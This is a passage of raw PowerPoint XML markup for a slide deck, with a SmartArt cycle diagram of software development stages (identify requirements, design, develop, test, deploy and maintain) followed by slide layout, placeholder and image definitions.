      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6736243" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6982830" y="306385"/>
        <a:ext cx="1190629" cy="119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E3F36-1887-442A-B31A-A46474B10E39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="513972" y="167217"/>
          <a:ext cx="2164809" cy="2314634"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 16200000"/>
            <a:gd name="adj2" fmla="val 2052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Architect and design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1643281" y="556296"/>
        <a:ext cx="695831" cy="495993"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2337B3F5-006B-4719-B3E7-D6CA690AE7F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="463984" y="233838"/>
          <a:ext cx="2304288" cy="2304288"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 20520000"/>
            <a:gd name="adj2" fmla="val 324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Develop</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1948055" y="1286678"/>
        <a:ext cx="685800" cy="548640"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A93784E-5A55-4F7F-B894-CC7508A7AA83}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="411863" y="271694"/>
          <a:ext cx="2304288" cy="2304288"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3240000"/>
            <a:gd name="adj2" fmla="val 756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Test</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1234823" y="1890182"/>
        <a:ext cx="658368" cy="603504"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{89DA5D83-6877-43D4-BD49-F525F39971A0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="359742" y="233838"/>
          <a:ext cx="2304288" cy="2304288"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 7560000"/>
            <a:gd name="adj2" fmla="val 1188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Deploy and maintain</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="494159" y="1286678"/>
        <a:ext cx="685800" cy="548640"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DE63C1DB-C0F6-4706-89B6-B693A3C7F9A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="379493" y="172390"/>
          <a:ext cx="2304288" cy="2304288"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 11880000"/>
            <a:gd name="adj2" fmla="val 1620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000" b="1" kern="1200" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Identify requirements</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="741047" y="559730"/>
        <a:ext cx="740664" cy="493776"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2178449E-D2C0-4223-8890-03515FA83295}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="302567" y="29663"/>
          <a:ext cx="2589580" cy="2589580"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5085"/>
            <a:gd name="adj2" fmla="val 327528"/>
            <a:gd name="adj3" fmla="val 20192361"/>
            <a:gd name="adj4" fmla="val 16200324"/>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55232D65-456A-403B-924B-1B38CC37469F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="321497" y="91171"/>
          <a:ext cx="2589580" cy="2589580"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5085"/>
            <a:gd name="adj2" fmla="val 327528"/>
            <a:gd name="adj3" fmla="val 2912753"/>
            <a:gd name="adj4" fmla="val 20519953"/>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FE48437E-7ED3-4CD8-9D6B-C5EB53A03A25}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="269217" y="129143"/>
          <a:ext cx="2589580" cy="2589580"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5085"/>
            <a:gd name="adj2" fmla="val 327528"/>
            <a:gd name="adj3" fmla="val 7232777"/>
            <a:gd name="adj4" fmla="val 3239695"/>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800B4ADC-3CA4-4049-AD19-A86AD9980E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="216937" y="91171"/>
          <a:ext cx="2589580" cy="2589580"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5085"/>
            <a:gd name="adj2" fmla="val 327528"/>
            <a:gd name="adj3" fmla="val 11552519"/>
            <a:gd name="adj4" fmla="val 7559718"/>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A16AB8F6-71CB-4200-B83D-7F0036C644BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="236955" y="29744"/>
          <a:ext cx="2589580" cy="2589580"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5085"/>
            <a:gd name="adj2" fmla="val 327528"/>
            <a:gd name="adj3" fmla="val 15872148"/>
            <a:gd name="adj4" fmla="val 11880111"/>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4/14/2020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4/14/2020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DA35F-9E58-5D40-92C1-D8C7631003B0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3395309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9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299EB29A-6C3A-8541-803C-21FA1290183E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19771" y="5570800"/>
            <a:ext cx="9163771" cy="913838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121277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0" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0FABA5-3959-4ECC-BCAF-965B5087E8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="100269"/>
            <a:ext cx="7883768" cy="844611"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 100" descr="book">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25255A9-7AEB-4215-B5D7-DAB4FE55B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374" y="2057400"/>
            <a:ext cx="1299252" cy="1157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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A169CA63-D23E-4494-8445-3335F13F19B9}"/>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358689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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12B6BB9-2A3D-DF4A-9060-5A45A706EC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7388352" y="5340096"/>
            <a:ext cx="1411636" cy="877824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34646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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028024" y="2574545"/>
            <a:ext cx="3087952" cy="1920240"/>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0" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF42795-A8F6-F84B-8E22-F8D65AD9D206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028024" y="2574545"/>
            <a:ext cx="3087952" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB28057-63C9-9D40-BE6D-F4769F21FF68}"/>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3" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB00FDF-1A37-814F-9593-6D1FC2D7B701}"/>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149041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1" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A628B6A3-652F-4FE1-B5B0-822F98382813}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7385231" y="5341937"/>
            <a:ext cx="1416844" cy="881063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6851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p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805920" y="2574545"/>
            <a:ext cx="3532160" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F53F9B4B-4A9B-A240-A5BF-BAF1522CD42D}"/>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B0A24C80-8B44-0248-B261-01FD44A26B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805920" y="2574545"/>
            <a:ext cx="3532160" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F523205-89DC-564B-B75C-6127AF0763C4}"/>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06450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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4381B051-CC06-447C-AEEE-4E1DE7CB3684}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5361B1AC-8EF9-494A-854A-0DEAAC0343F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775200" y="4622800"/>
            <a:ext cx="4368800" cy="2235200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1364322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9760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31895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624472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425707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0" name="Picture Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9579387D-9BE2-4A19-9DB3-EA5D808DAF7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="2906713"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D59A8F-E744-4482-BF05-F930781695A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="4406900"/>
            <a:ext cx="7772400" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="4000" b="1" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="1B3764"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>click to add topic title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183808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95734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26562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050054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41859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082504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eflective Questions">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="header_strok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944880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="bubb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3" y="33129"/>
            <a:ext cx="9144000" cy="6858000"/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302039"/>
            <a:ext cx="8460150" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>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#1</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#2</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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflective Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3653716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21590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536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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170D9580-72B3-0741-AD19-EAC244F662F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6008696"/>
            <a:ext cx="9144000" cy="469248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14007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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77C79A9F-737E-FD41-B56D-4432E8119ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270791" y="4259179"/>
            <a:ext cx="2873208" cy="2606229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320340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528"/>
            <a:ext cx="8460150" cy="438912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6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1408"/>
            <a:ext cx="846015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2" name="Picture 100" descr="book">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED50CB8A-6B60-044F-87D5-5441D94268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52FEBA-E760-FA4D-972E-FD682E4601A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270791" y="4259179"/>
            <a:ext cx="2873208" cy="2606229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116472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9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7391AD46-E71E-1B48-BB59-94B0336F7A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId27"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="951179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 2"/>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4170488459"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483928" r:id="rId1"/>
    <p:sldLayoutId id="2147483948" r:id="rId2"/>
    <p:sldLayoutId id="2147483952" r:id="rId3"/>
    <p:sldLayoutId id="2147483938" r:id="rId4"/>
    <p:sldLayoutId id="2147483930" r:id="rId5"/>
    <p:sldLayoutId id="2147483931" r:id="rId6"/>
    <p:sldLayoutId id="2147483932" r:id="rId7"/>
    <p:sldLayoutId id="2147483949" r:id="rId8"/>
    <p:sldLayoutId id="2147483933" r:id="rId9"/>
    <p:sldLayoutId id="2147483951" r:id="rId10"/>
    <p:sldLayoutId id="2147483934" r:id="rId11"/>
    <p:sldLayoutId id="2147483935" r:id="rId12"/>
    <p:sldLayoutId id="2147483936" r:id="rId13"/>
    <p:sldLayoutId id="2147483937" r:id="rId14"/>
    <p:sldLayoutId id="2147483939" r:id="rId15"/>
    <p:sldLayoutId id="2147483940" r:id="rId16"/>
    <p:sldLayoutId id="2147483950" r:id="rId17"/>
    <p:sldLayoutId id="2147483929" r:id="rId18"/>
    <p:sldLayoutId id="2147483942" r:id="rId19"/>
    <p:sldLayoutId id="2147483943" r:id="rId20"/>
    <p:sldLayoutId id="2147483944" r:id="rId21"/>
    <p:sldLayoutId id="2147483945" r:id="rId22"/>
    <p:sldLayoutId id="2147483946" r:id="rId23"/>
    <p:sldLayoutId id="2147483947" r:id="rId24"/>
    <p:sldLayoutId id="2147483953" r:id="rId25"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
